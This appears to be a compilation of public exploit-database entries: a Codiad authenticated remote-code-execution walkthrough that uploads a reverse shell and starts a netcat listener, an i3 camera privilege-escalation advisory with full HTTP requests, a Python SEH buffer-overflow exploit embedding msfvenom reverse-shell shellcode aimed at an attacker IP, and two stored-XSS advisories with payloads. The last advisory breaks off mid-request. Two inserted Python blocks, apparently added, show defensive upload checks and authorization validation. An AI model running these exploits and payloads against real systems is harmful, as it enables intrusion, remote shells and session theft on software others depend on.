
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Link: https://github.com/Codiad/Codiad/releases
# Type:  WebApp

# Proof of Concept:
#
#   1- Log in to Codiad.
#   2- Go to the themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/ directory.
#   3- Right-click and select "Upload file".
#   4- Click "Drag file or Click Here To Upload" and select your reverse_shell file.
#
# After that your file should be in the INF directory. Right-click on your file, select "Delete",
# and you will see the full path of your file:
#
#   /var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php
#
# Request it from your terminal with curl and boom!!

1 - # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"
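As an added example (not part of this exploit or of the Codiad project), the following Python shows the two defensive checks that this PoC relies on being absent: an allow-list filter for uploads into an images directory that inspects every suffix of the file name, and a scan that hunts an existing web root for server-executable files under directories meant to hold only static assets. The directory tree, the suffix lists and the placeholder file contents are constructed for the example.

```python
import tempfile
from pathlib import Path

# Suffixes a typical PHP handler will execute, and the image types an images
# directory is expected to hold. Both lists are constructed for this example and
# should be tuned to the server's real handler configuration.
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar", ".phps"}
IMAGE_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".webp"}


def is_acceptable_image_upload(filename):
    """Allow-list check for an upload into an images directory.

    Every suffix is inspected, so 'shell.php.png' is rejected as well as
    'shell.php', and the final suffix must be an image type.
    """
    suffixes = [s.lower() for s in Path(filename).suffixes]
    if not suffixes:
        return False
    if any(s in EXECUTABLE_SUFFIXES for s in suffixes):
        return False
    return suffixes[-1] in IMAGE_SUFFIXES


def find_unexpected_executables(root):
    """Walk a directory that should contain only static assets and return the
    relative POSIX paths of server-executable files, sorted, for review."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in EXECUTABLE_SUFFIXES:
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def build_constructed_tree():
    """Create a throwaway directory tree mimicking the theme path from the PoC.
    File contents are placeholders; nothing here is real code."""
    root = Path(tempfile.mkdtemp(prefix="codiad-images-"))
    base = "themes/default/filemanager/images/codiad"
    files = {
        f"{base}/logo.png": b"placeholder image bytes",
        f"{base}/manifest/files/codiad/example/INF/shell.php": b"placeholder, not a script",
        f"{base}/manifest/files/codiad/example/INF/readme.txt": b"placeholder text",
    }
    for rel, data in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return root


if __name__ == "__main__":
    tree = build_constructed_tree()
    print("unexpected executables:", find_unexpected_executables(tree))
    for name in ("logo.png", "shell.php", "shell.php.png", "shell.phtml", "noext"):
        verdict = "accept" if is_acceptable_image_upload(name) else "reject"
        print(f"{name}: {verdict}")
```

The scan is a hunting aid, not a control on its own: a web server that executes PHP under the images tree will run whatever lands there, so the upload filter and a handler configuration that disables execution in asset directories are the actual fix.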
            
# Exploit Title: i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw
# Date: 27.10.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.i3international.com


i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw


Vendor: i3 International Inc.
Product web page: https://www.i3international.com
Affected version: V5.2.0 build 150317 (Ax46)
                  V5.0.9 build 151106 (Ax68)
                  V5.0.9 build 150615 (Ax78)


Summary: The Annexxus camera 6MP provides 4 simultaneous,
independently controlled digital pan-tilt-zoom (ePTZ) video
streams, which may be recorded or viewed live, as well as a
built-in microphone and speaker allowing two-way communication.

Desc: The application does not allow creation of more than one
administrator account on the system, and likewise does not allow
deletion of the administrative account. The logic behind this
restriction can be bypassed by parameter manipulation using
dangerous verbs such as PUT and DELETE, because of improper
server-side validation. Once a normal account with 'viewer' or
'operator' permissions has been added by the default admin user
'i3admin', a PUT request can be issued to the 'UserPermission'
endpoint with the ID of the created account, setting its userType
to 'admin' and successfully adding a second administrative account.

Tested on: App-webs/


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (@zeroscience)


Advisory ID: ZSL-2021-5688
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php


27.10.2021

--


Make user ID 3 an Administrator:
--------------------------------

PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1
Host: 192.168.1.1
Content-Length: 556
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close

<?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID><userType>admin</userType><remotePermission><playBack>true</playBack><preview>true</preview><record>true</record><ptzControl>true</ptzControl><upgrade>true</upgrade><parameterConfig>true</parameterConfig><restartOrShutdown>true</restartOrShutdown><logOrStateCheck>true</logOrStateCheck><voiceTalk>true</voiceTalk><transParentChannel>true</transParentChannel><contorlLocalOut>true</contorlLocalOut><alarmOutOrUpload>true</alarmOutOrUpload></remotePermission></UserPermission>


HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:13:56 GMT
Server: App-webs/
Connection: close
Content-Length: 238
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/PSIA/Custom/SelfExt/UserPermission/3</requestURL>
<statusCode>1</statusCode>
<statusString>OK</statusString>
</ResponseStatus>



Delete Administrator user ID 3:
-------------------------------

DELETE /PSIA/Security/AAA/users/3 HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close


HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:20:17 GMT
Server: App-webs/
Connection: close
Content-Length: 213
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="urn:psialliance-org">
<requestURL>/PSIA/Security/AAA/users/3</requestURL>
<statusCode>1</statusCode>
<statusString>OK</statusString>
</ResponseStatus>
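Added example, not part of the advisory or of the vendor firmware: a Python sketch of the server-side validation the advisory says is missing, written against the UserPermission body shown above (abridged here), plus a log-side detector for the two request shapes in the PoC. The user table, the set of allowed userType values and the single-administrator rule are assumptions taken from the advisory's description; the endpoint paths are those in the requests above.

```python
import xml.etree.ElementTree as ET

# Constructed user table: the camera's default administrator plus a 'viewer'
# account the administrator created. IDs and names are assumptions.
USERS = {
    1: {"name": "i3admin", "userType": "admin"},
    3: {"name": "viewer1", "userType": "viewer"},
}

# userType values the advisory mentions; assumed to be the complete set.
ALLOWED_USER_TYPES = {"admin", "operator", "viewer"}
PERMISSION_PATH = "/PSIA/Custom/SelfExt/UserPermission/"
USERS_PATH = "/PSIA/Security/AAA/users/"

# The PUT body from the advisory, abridged to the elements the policy inspects.
POC_BODY = (
    "<?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID>"
    "<userType>admin</userType><remotePermission><playBack>true</playBack>"
    "</remotePermission></UserPermission>"
)


def parse_user_permission(body):
    """Return (id, userID, userType) from a UserPermission document or raise ValueError.
    Production code should parse untrusted XML with defusedxml rather than the stdlib parser."""
    root = ET.fromstring(body)
    if root.tag != "UserPermission":
        raise ValueError("unexpected root element")
    try:
        rec_id = int(root.findtext("id"))
        user_id = int(root.findtext("userID"))
    except (TypeError, ValueError):
        raise ValueError("missing or non-numeric id")
    user_type = (root.findtext("userType") or "").strip()
    if user_type not in ALLOWED_USER_TYPES:
        raise ValueError("unknown userType")
    return rec_id, user_id, user_type


def admin_ids(users):
    return {uid for uid, u in users.items() if u["userType"] == "admin"}


def check_permission_update(users, path_id, body):
    """Policy for PUT .../UserPermission/<id>. Returns (allowed, reason)."""
    try:
        rec_id, user_id, user_type = parse_user_permission(body)
    except ValueError as exc:
        return False, f"rejected: {exc}"
    if rec_id != path_id or user_id != path_id:
        return False, "rejected: body id does not match the URL id"
    if path_id not in users:
        return False, "rejected: unknown user"
    # The single-administrator rule: only the existing admin may carry userType admin.
    if user_type == "admin" and path_id not in admin_ids(users):
        return False, "rejected: only one administrator account is permitted"
    return True, "allowed"


def check_user_delete(users, path_id):
    """Policy for DELETE .../users/<id>. Returns (allowed, reason)."""
    if path_id not in users:
        return False, "rejected: unknown user"
    if path_id in admin_ids(users):
        return False, "rejected: the administrator account cannot be deleted"
    return True, "allowed"


def flag_request(users, method, path, body=""):
    """Detection helper for proxy or web-server logs: True for a PUT that tries to
    grant admin through UserPermission, or a DELETE aimed at an administrator."""
    if method == "PUT" and path.startswith(PERMISSION_PATH):
        return "<userType>admin</userType>" in body
    if method == "DELETE" and path.startswith(USERS_PATH):
        tail = path[len(USERS_PATH):]
        return tail.isdigit() and int(tail) in admin_ids(users)
    return False


if __name__ == "__main__":
    print(check_permission_update(USERS, 3, POC_BODY))
    print(check_user_delete(USERS, 1))
    print(flag_request(USERS, "PUT", PERMISSION_PATH + "3", POC_BODY))
```

Two details carry the weight: the body's id fields are compared with the id in the URL, so a request cannot talk about one record while addressing another, and the admin check is made against the current user table rather than trusting the submitted userType.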
            
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928 

# Proof of Concept:
# 1. Run python2 exploit.py to generate overflow.txt
# 2. Transfer overflow.txt to the Windows 10 machine
# 3. Set up a Netcat listener on the attacker machine
# 4. Open 10-Strike Network Inventory Explorer Pro
# 5. Select the Computers tab from the uppermost set of tabs
# 6. Select the From Text File option
# 7. Open overflow.txt
# 8. Receive the reverse shell connection on the attacker machine!

#!/usr/bin/env python2
import struct

# Bad-character probe: every byte value except the ones the application mangles.
# Left over from the bad-character analysis; it is not part of the final buffer.
charslist = ""
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]

for i in range (0x00, 0xFF+1):
        if i not in badchars:
                charslist += chr(i)

#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")

#pattern_offset.rb -l 250 -q 41316841
offset = 213

#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))

#0x61e012f6 : pop edi # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)

#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode

buffer = junk + nseh + seh + subesp10 + payload

f = open("overflow.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
# Date: 2021-10-28
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: v5
# Tested on: Linux

Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300


Release Date:
=============
2021-10-28


Vulnerability Laboratory ID (VL-ID):
====================================
2300


Common Vulnerability Scoring System:
====================================
5.4


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
Developer License and customize the script to fit your specific needs.

(Copy of the Homepage: https://www.phpjabbers.com/simple-cms/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.


Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHPJabbers Simple CMS v5.0 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.

The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) POST method requests.
Privileged authenticated accounts with UI access are able to inject their own malicious script code as the name of a user.
The script code executes after the injection via POST method in the user list (pjAdminUsers).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create (Add)
[+] Update

Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate

Affected Module(s):
[+] pjAdminUsers


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged user accounts and low user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.


PoC: Payloads
"><img src=evil.source onload=alert(document.cookie)>
"><img src=evil.source onload=alert(document.domain)>


--- PoC Session Logs (POST) [Add & Update]
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive: timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
class="pj-table-select-row"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>


Reference(s):
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:  www.vulnerability-lab.com  www.vuln-lab.com  www.vulnerability-db.com
Services: magazine.vulnerability-lab.com  paste.vulnerability-db.com  infosec.vulnerability-db.com
Social:   twitter.com/vuln_lab  facebook.com/VulnerabilityLab  youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php  vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
            
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux


Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277


Release Date:
=============
2021-10-28


Vulnerability Laboratory ID (VL-ID):
====================================
2277


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Hotel, Motel, Bar & Restaurant Listing Plugin + Membership plugin for WordPress, built with PHP and MySQL technology.

(Copy of the Homepage: https://hotel.eplug-ins.com/hoteldoc/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.


Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-
web-application requests from the application side.

The vulnerabilities are located in the address, city, zipcode, country and location input fields of the add new listing form in the my-account module.
Remote attackers can register a low-privileged application user account and inject their own malicious script code with a persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected modules. The execution of the injected script code takes
place in the frontend on preview, and also in the backend when administrative accounts edit or list (?&profile=all-post) the entries.
The request method used to inject is POST and the attack vector is persistent, located on the application side.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add New Listing


Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country

Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit


Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with privileged user accounts and low user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.


Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E


Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>							
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">
</div>							
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>							
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
</div>														
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>							
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>							
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>							
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">
</div>



--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
